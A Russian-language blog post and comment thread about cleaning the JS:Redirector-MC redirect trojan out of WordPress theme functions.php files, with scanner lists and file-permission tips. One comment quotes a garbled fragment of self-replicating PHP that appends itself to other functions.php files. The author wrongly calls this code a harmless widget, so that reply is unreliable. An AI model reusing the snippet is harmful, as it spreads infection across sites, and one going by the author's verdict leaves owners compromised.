WordPress и мобильный редирект JS:Redirector-MC
Как защитить блог WordPress от вирусов и троянов таких как Мобильный редирект. Он же JS:Redirector-MC [Trj]. Его можно обнаружить с помощью антивируса AVAST и браузера OPERA.
Проще всего увидеть проблему при просмотре сайта под браузером Opera: появится предупреждение «троян блокирован», заражение «JS:Redirector-MC [Trj]» это и есть Trj мобильный редирект.
Как убрать JS:Redirector-MC
В редкаторе кода открываем файл functions.php и в самом низу видим код:
Путь к файлу: корневая_папка/wp-content/themes/ваша_тема/functions.php
На всякий случай проверьте другие шаблоны. Бывает заражение проходит по всем темам на сайте.
Нужно удалить этот код редиректа
Возможно у Вас есть оригинальная версия файла функций из шаблона. В таком случае можете заменить файл оригинальной версией, перезаписав его.
Список on-line сервисов проверки сайта на взлом
- Virustotal — самый популярный
- Яндекс сервис
- Сайт Pr-cy.ru
- Sucuri — сервис с самой актуальной базой
- Сервис — 2ip.ru
- Antivirus-alarm.ru
Лучше всего для предупреждения заражения и проверки здоровья сайта пользоваться скриптом ai-bolit. Сервис прекрасно работает. Всегда есть актуальные данные и его списка вполне достаточно для очень многих php сайтов. Если нужны инструкции по работе с ай-болитом напишите в комментариях.
О том какой сервис по он-лайн проверки лучше, стоит почитать на habr.
JS:Redirector-MC [Trj] (мобильный редирект) форум
Скриншот форума про описание нескольких гипотез действия вируса:
Последствия заражения редиректом: потеря позиций в выдаче поисковых систем и метка и «небезопасный сайт». Если долгое время не исправлять ситуацию сайт могут добавить в базу вредоносных сайтов сервисы антивирусов. После этого нужно будет ждать обновления их баз для исправления ситуации.
Здравствуйте, Роман! Информация как раз вовремя. Скажите, а если этот код
base64_decode обнаружен в файлах темы, есть смысл его убирать и оставить тему или все-таки лучше взять другую?
Юлия не обязательно менять всю тему. Если вы знаете где находиться код редиктора замените только его, через онлайн проверку на вирусы вы можете определить заряженный файл и отредактировать ее, если поставите другую тему, придется все счетчики и настройки делать с начало, подумайте!
>>>»и в самом внизу вы можете обнаружить следующий код:»
какой именно участок кода нужно извлечь?
А какой сайт? наверно footer.php
http://www.mttf.su в functions ничего потустороннего не нашел, аваст ругается совершенно на другое файло, гдето в дебрях wp-content… please help!)
Попробуй удалить кеш, авто сохранение. Я обнаружил целых два вируса на вашем сайте, попробуй отключить еще рекламу. И если есть копия темы обнови + обнови WordPress До последней версии.
Здравия желаю! Могу попросить, удалить ссылку из комментария?
Победил тварь обновлением до последней версии….
Проверила. Первый сервис ответил очень быстро, что вирусов нет и сайт безопасный. А второй долго крутил колесико и выдал длинную строку: undefinedundefinedundefinedundefinedundefinedundefinedundefinedu
Что это значит? Тоже ничего не обнаружено? 🙁
Спасибо.
Проверьте еще через оперу, если ни чего нет все нормально, еще вариантом будет проверить через мобильный телефон, если после загрузки вашего сайта вас перекидывает на регистрацию, значит вирус есть, если ни чего не меняется и страница подгружается как обычно, тогда все нормально.
Спасибо!
Проверила. Все нормально. Спасибо!
Тоже пользуюсь антивирусом AVAST, и очень довольна, отлавливает всю нечисть в момент! 😀
К счастью не нашел вирусов на своих проектах. Видимо потому, что пишу движок на ASP. Надо бы почаще логи мониторить, а то мало-ли что народные умельцы еще придумают.
Хорошо что не нашли Orcinus Orca, а я с двух блогов вытащил, сейчас все нормально, установил антивирус Avast/
Тоже «поймал» эту заразу в декабре- знакомые писали письма, что Avast блокирует мой сайт, а я с Nod-32 сидел и в ус не дул [:-} . Сейчас тоже перешел на Avast.
Сайтов много, но вот один причем не коммерция вчера поймай трояна, всовывали через логин (остался Ip адрес испанца) За час все восстановили с помощью админа провайдера, сайт пере-установить пришлось. Проверил содержимое скаченного через FTP на вирусы все чисто.. Вот такая гнусная история.
Добрый день!
Вы пишете «советую проверить свои блоги на наличии вирусов, особенно те которые находятся на хостинге Timeweb». У меня несколько сайтов как раз у Timeweb. И несколько сайтов и на Вордпрессе, и на Джумла взломали. Пароли меняю, стоит антивирус. Я им и написал, чтобы они у себя проверили — говорят, могут только логи предоставить, ищите сами…
Скажите, пожалуйста, почему вы упомянули Таймвеб?
Ну я сам лично, держу все проекты на этом хостинге, вот по этому и посоветовал, но скажу честно это массовая атака и страдать будут все не защищенные проекты
Кстати, вирус может через некоторое время снова записать себя в файл functions.php, потому советую поставить на него права доступа 444 (только чтение). Если вам нужно постоянно что-то обновлять в этом файле — можно создать свой файл с настройками и просто инклудить его в файл functions.php
Открываете файл functions.php
Подскажите,а где его открывать? Если можно, объясните пожалуйста как блондинке))))
Скопируйте его с хостинга на компьютер и откройте с помощью например программы notepad, и удалите ненужный код, можно воспользоваться другим вариантом, на хостинге Открываете файл functions.php правой кнопкой мыши и выбираете правка, удаляете код и перезаписываете снова, поставьте права на файл 444.
Спасибо большое! Еще маленький вопросик, если на компьюторе обнаружен этот вирус это ведь еще не значит что именно мой сайт заражен?Может быть вы подумаете что я совсем Дуб,но просто мой Аваст при глубоком сканировании комп. нашел этот вирус.
Нет не значит, аваст должен ругаться на сайт при заражение, Лечите компьютер и все будет ОК
Роман, у меня вирус js:redirector-PM [trj]на CMS Drupal. Не знаете, как бороться в данном случае?
Ищите файл который отвечает за функции, и выполните все те же действия что я описывал, этот вирус можно излечить, права на файл поставьте 444
Большое спасибо, вроде бы всё сделал, но…
когда после этой процедуры заходил на свой сайт через Mozilla Firefox, Avast по-прежнему ругался и говорил про соединение с вредоносным сайтом.
Через некоторое время после этого я очисти кэш браузера, зашёл на сайт и…всё впорядке — Avast не ругается. Так что же делать, продолжать искать вирус или дело действительно было в КЭШе (если это вообще возможно)?
На моем домене, там еще и сайта почти нет, тоже обнаружила этот вирус, помогла программа siteverify. Вроде все удалила, даже шаблон сменила. На сайте нет, а вот через приложение SDR bar в хроме почему-то лезет. Как открою, так нод32 ругается.
Спасибо! Сайт на хостинге Джино. Проверил все сайты, но вирус только на одном.
И ещё. Заметил такую особенность: когда был вирус, то исходный код не отображался (нажимаешь в опере «посмотреть исходный код», а там пустой лист). А когда удалил вирус, то всё нормально — код на месте.
Роман, здравствуйте.
У меня проблема с сайтом. Постоянно выскакивает троян Trojan.JS.Redirector.ux (scounter) прописывается в файле function.php
Скачивал на комп сайт, проверил Касперским. Он его вылечил. Обратно залил, но история через несколько дней повторилась.
Поставил разрешение на файл function.php 444
Но антивирус на сайте бъет тревогу. Яндекс блокирует сайт.
Пожалуйста помогите. естественно за вознаграждение
Кирилл, версия WordPress какая стоит?
Был установлен WordPress 3.2.1
Сейчас обновился до 3.3.2. Но почему-то не могу зайти в админку
твой сайт который указан в комментариях?
Напиши мне по емайл подробности, Я тебе дам рекомендации
Роман, мой сайт belevichka.ru
почта belevichka@yandex.ru
Твоей почты к сож. не нашел (
Нашел на сайте такой кусок кода, антивирус для вордпресса его ставит под сомнение. Остальные антивирусы не обращают на файлы никакого внимания.
код из файла functions.php
<?php
function _verify_isactivate_widgets(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"») !== false ? «» : «?».»>»;
$output .= $before . «Not found» . $after;
if (stripos( substr($cont,-20),»?».»>») !== false){$cont=substr($cont,0,strripos($cont,»?».»>») + 2);}
$output=rtrim($output, «nt»); fputs($f=fopen($item,»w+»),$cont . $seprar . «n» .$widget);fclose($f);
$output .= ($showsdots && $ellipsis) ? «…» : «»;
}
}
}
}
return $output;
}
function _get_allwidgetscont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == «/»){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != «.» && $elem != «..»){
if (is_dir($places . «/» . $elem)){
$wids[]=$places . «/» . $elem;
} elseif (is_file($places . «/» . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . «/» . $elem;}
}
}
}else{
return false;
Причем ставит под сомнения следующие строчки:
$cont=file_get_contents($item);
$output=rtrim($output, » «); fputs($f=fopen($item,»w+»),$cont . $seprar . » » .$widget);fc …
… n($item,»w+»),$cont . $seprar . » » .$widget);fclose($f);
} elseif (is_file($places . «/» . $elem)&&
Подскажи пожалуйста, что это за код и нужен ли он вообще?
Обратитесь первым делом на сервер, выдает ошибку вход админку (пишет
Сервер временно не в состоянии обслуживать ваш запрос из-за простоя обслуживания или проблемы пропускной способности. Пожалуйста, повторите попытку позже.), у хоста узнаете причину. Этот код выводит виджет, это не вирус
Опаньки. Timeweb… Я уже пол года со своих сайтов у этого провайдера вывожу этих троянов. Похоже пора менять хостера. Ктонить посоветует?
Я ход назад с Timeweb перtшёл на webhost1. Доволен. За 1 доллар даётся 1000МБ места, можно размещать до 10 сайтов, трафик неограничен. Даже предновогодний подъем трафика до 4000-5000 человек в сутки выдержал без проблем. Хотя статистика и показывала превышения нагрузки, предупреждений от хостера не поступало.
А для защиты сайта рекомендую установить плагин wordpress-firewall-2- активировал и забыл, плагин контролирует малейшие изменения в Ваших php файлах, не дает возможности установки плагинов, деактивирует плагины если они не соответствуют безопасности.
Ну так хоть кусок кода для его поиска можно дать?
А то на картинке нифига не разобрать